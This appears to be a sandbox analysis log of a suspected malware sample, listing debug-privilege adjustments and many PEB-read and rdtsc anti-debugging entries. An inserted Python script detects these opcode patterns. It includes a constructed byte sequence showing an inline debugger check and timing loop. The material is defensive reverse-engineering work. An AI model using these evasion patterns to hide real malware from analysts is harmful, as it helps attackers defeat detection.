Source: explorer.exe, 00000004.00000003.533892507.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551309826.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.539351486.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551825356.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.593029452.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01835BA5 rdtsc 3_2_01835BA5
Source: C:\Users\user\Desktop\SC_0017384.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Process token adjusted: Debug Jump to behavior
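The rdtsc entry above and the "mov eax, dword ptr fs:[00000030h]" entries that follow (the function 3_2_01835BA5 appears in both lists) are the two byte patterns a reverser looks for in an unpacked 32-bit image: fs:[30h] is the PEB pointer, and reading it inline is how a sample checks BeingDebugged or NtGlobalFlag without calling IsDebuggerPresent; a pair of rdtsc reads around a code stretch is the timing check. The following is an added example, not the sample's code and not the sandbox's detection logic, that locates these patterns in a raw byte blob such as a memory dump. The sample bytes are constructed for the example; the instruction encodings are the standard ones. Matching raw bytes is a heuristic: 0F 31 can also occur inside data or in the middle of a longer instruction, so hits should be confirmed in a disassembler.

```python
"""Scan 32-bit x86 code bytes for anti-analysis opcode patterns.

Added example, not code from the report or from the sample. It finds the
rdtsc and PEB/TEB segment reads that sandbox signatures such as
"Code function: ... rdtsc" and "mov eax, dword ptr fs:[00000030h]"
are derived from, and recognises the textbook inline BeingDebugged check.
"""
from collections import Counter

# Standard 32-bit encodings (fs segment override is 0x64).
PATTERNS = {
    "rdtsc":               bytes.fromhex("0f31"),
    "mov eax, fs:[30h]":   bytes.fromhex("64a130000000"),    # A1 moffs32 short form
    "mov eax, fs:[30h] *": bytes.fromhex("648b0530000000"),  # 8B /r with disp32
    "mov ecx, fs:[30h]":   bytes.fromhex("648b0d30000000"),
    "mov eax, fs:[18h]":   bytes.fromhex("64a118000000"),    # TEB self pointer
}

# movzx eax, byte ptr [eax+2]: PEB+2 is the BeingDebugged flag.
_MOVZX_PEB_PLUS_2 = bytes.fromhex("0fb64002")

# Constructed sample: an inline BeingDebugged check followed by a timing loop.
SAMPLE_CODE = bytes.fromhex(
    "64a130000000"   # mov eax, fs:[30h]            ; PEB
    "0fb64002"       # movzx eax, byte ptr [eax+2]  ; PEB->BeingDebugged
    "85c0"           # test eax, eax
    "7502"           # jnz short +2
    "0f31"           # rdtsc
    "8bd8"           # mov ebx, eax
    "90"             # nop
    "0f31"           # rdtsc
    "2bc3"           # sub eax, ebx                 ; elapsed cycles
    "c3"             # ret
)


def find_patterns(code, base=0):
    """Return sorted (address, label) hits for every pattern in `code`.

    `base` is the virtual address of code[0], so hits can be compared with
    the function addresses a sandbox or disassembler reports.
    """
    hits = []
    for label, pat in PATTERNS.items():
        start = 0
        while True:
            idx = code.find(pat, start)
            if idx < 0:
                break
            hits.append((base + idx, label))
            start = idx + 1
    return sorted(hits)


def count_by_label(hits):
    """Count hits per pattern label."""
    return Counter(label for _, label in hits)


def looks_like_being_debugged_check(code, offset):
    """True if a PEB read at `offset` is immediately followed by a read of PEB+2.

    'mov eax, fs:[30h]' then 'movzx eax, byte ptr [eax+2]' is the inline
    equivalent of IsDebuggerPresent; a plain PEB read on its own is also
    used by benign code (loader, TLS, heap), so only this pairing is flagged.
    """
    for pat in (PATTERNS["mov eax, fs:[30h]"], PATTERNS["mov eax, fs:[30h] *"]):
        if code.startswith(pat, offset):
            return code.startswith(_MOVZX_PEB_PLUS_2, offset + len(pat))
    return False


if __name__ == "__main__":
    for addr, label in find_patterns(SAMPLE_CODE, base=0x1000):
        note = ""
        if label.startswith("mov eax, fs:[30h]") and \
                looks_like_being_debugged_check(SAMPLE_CODE, addr - 0x1000):
            note = "  <- inline BeingDebugged check"
        print(f"{addr:08x}  {label}{note}")
    print(dict(count_by_label(find_patterns(SAMPLE_CODE))))
```

Run against a dump of the stage that the report labels 3_2 (rather than the packed file on disk), with `base` set to the dump's load address, the hit addresses line up directly with the function identifiers in the entries above. Two rdtsc hits close together are the timing-check shape; a single rdtsc is weak evidence by itself.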
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h] 3_2_0176B171
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h] 3_2_0176B171
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176C962 mov eax, dword ptr fs:[00000030h] 3_2_0176C962
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h] 3_2_0178B944
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h] 3_2_0178B944
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179513A mov eax, dword ptr fs:[00000030h] 3_2_0179513A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179513A mov eax, dword ptr fs:[00000030h] 3_2_0179513A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov ecx, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] 3_2_01769100
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] 3_2_01769100
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] 3_2_01769100
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0176B1E1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0176B1E1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0176B1E1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017F41E8 mov eax, dword ptr fs:[00000030h] 3_2_017F41E8
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E69A6 mov eax, dword ptr fs:[00000030h] 3_2_017E69A6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h] 3_2_017961A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h] 3_2_017961A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792990 mov eax, dword ptr fs:[00000030h] 3_2_01792990
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178C182 mov eax, dword ptr fs:[00000030h] 3_2_0178C182
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A185 mov eax, dword ptr fs:[00000030h] 3_2_0179A185
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01780050 mov eax, dword ptr fs:[00000030h] 3_2_01780050
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01780050 mov eax, dword ptr fs:[00000030h] 3_2_01780050
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] 3_2_017E7016
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] 3_2_017E7016
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] 3_2_017E7016
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01834015 mov eax, dword ptr fs:[00000030h] 3_2_01834015
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01834015 mov eax, dword ptr fs:[00000030h] 3_2_01834015
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017658EC mov eax, dword ptr fs:[00000030h] 3_2_017658EC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179F0BF mov ecx, dword ptr fs:[00000030h] 3_2_0179F0BF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h] 3_2_0179F0BF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h] 3_2_0179F0BF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A90AF mov eax, dword ptr fs:[00000030h] 3_2_017A90AF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01822073 mov eax, dword ptr fs:[00000030h] 3_2_01822073
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769080 mov eax, dword ptr fs:[00000030h] 3_2_01769080
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01831074 mov eax, dword ptr fs:[00000030h] 3_2_01831074
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h] 3_2_017E3884
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h] 3_2_017E3884
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181D380 mov ecx, dword ptr fs:[00000030h] 3_2_0181D380
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h] 3_2_01793B7A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h] 3_2_01793B7A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182138A mov eax, dword ptr fs:[00000030h] 3_2_0182138A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176DB60 mov ecx, dword ptr fs:[00000030h] 3_2_0176DB60
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01835BA5 mov eax, dword ptr fs:[00000030h] 3_2_01835BA5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176F358 mov eax, dword ptr fs:[00000030h] 3_2_0176F358
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176DB40 mov eax, dword ptr fs:[00000030h] 3_2_0176DB40
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178DBE9 mov eax, dword ptr fs:[00000030h] 3_2_0178DBE9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182131B mov eax, dword ptr fs:[00000030h] 3_2_0182131B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h] 3_2_017E53CA
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h] 3_2_017E53CA
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] 3_2_01794BAD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] 3_2_01794BAD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] 3_2_01794BAD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838B58 mov eax, dword ptr fs:[00000030h] 3_2_01838B58
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179B390 mov eax, dword ptr fs:[00000030h] 3_2_0179B390
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792397 mov eax, dword ptr fs:[00000030h] 3_2_01792397
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h] 3_2_01771B8F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h] 3_2_01771B8F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A927A mov eax, dword ptr fs:[00000030h] 3_2_017A927A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017F4257 mov eax, dword ptr fs:[00000030h] 3_2_017F4257
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h] 3_2_017A4A2C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h] 3_2_017A4A2C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h] 3_2_0176AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h] 3_2_0176AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01783A1C mov eax, dword ptr fs:[00000030h] 3_2_01783A1C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov ecx, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01778A0A mov eax, dword ptr fs:[00000030h] 3_2_01778A0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h] 3_2_0182AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h] 3_2_0182AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792AE4 mov eax, dword ptr fs:[00000030h] 3_2_01792AE4
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792ACB mov eax, dword ptr fs:[00000030h] 3_2_01792ACB
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h] 3_2_0177AAB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h] 3_2_0177AAB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179FAB0 mov eax, dword ptr fs:[00000030h] 3_2_0179FAB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182EA55 mov eax, dword ptr fs:[00000030h] 3_2_0182EA55
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h] 3_2_0181B260
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h] 3_2_0181B260
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838A62 mov eax, dword ptr fs:[00000030h] 3_2_01838A62
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h] 3_2_0179D294
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h] 3_2_0179D294
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h] 3_2_0178C577
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h] 3_2_0178C577
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01787D50 mov eax, dword ptr fs:[00000030h] 3_2_01787D50
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018305AC mov eax, dword ptr fs:[00000030h] 3_2_018305AC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018305AC mov eax, dword ptr fs:[00000030h] 3_2_018305AC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A3D43 mov eax, dword ptr fs:[00000030h] 3_2_017A3D43
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E3540 mov eax, dword ptr fs:[00000030h] 3_2_017E3540
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] 3_2_01794D3B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] 3_2_01794D3B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] 3_2_01794D3B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176AD30 mov eax, dword ptr fs:[00000030h] 3_2_0176AD30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017EA537 mov eax, dword ptr fs:[00000030h] 3_2_017EA537
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01818DF1 mov eax, dword ptr fs:[00000030h] 3_2_01818DF1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h] 3_2_0177D5E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h] 3_2_0177D5E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838D34 mov eax, dword ptr fs:[00000030h] 3_2_01838D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov ecx, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182E539 mov eax, dword ptr fs:[00000030h] 3_2_0182E539
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h] 3_2_01791DB5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h] 3_2_01791DB5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h] 3_2_01791DB5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017935A1 mov eax, dword ptr fs:[00000030h] 3_2_017935A1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h] 3_2_0179FD9B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h] 3_2_0179FD9B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178746D mov eax, dword ptr fs:[00000030h] 3_2_0178746D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h] 3_2_017FC450
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A44B mov eax, dword ptr fs:[00000030h] 3_2_0179A44B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838CD6 mov eax, dword ptr fs:[00000030h] 3_2_01838CD6
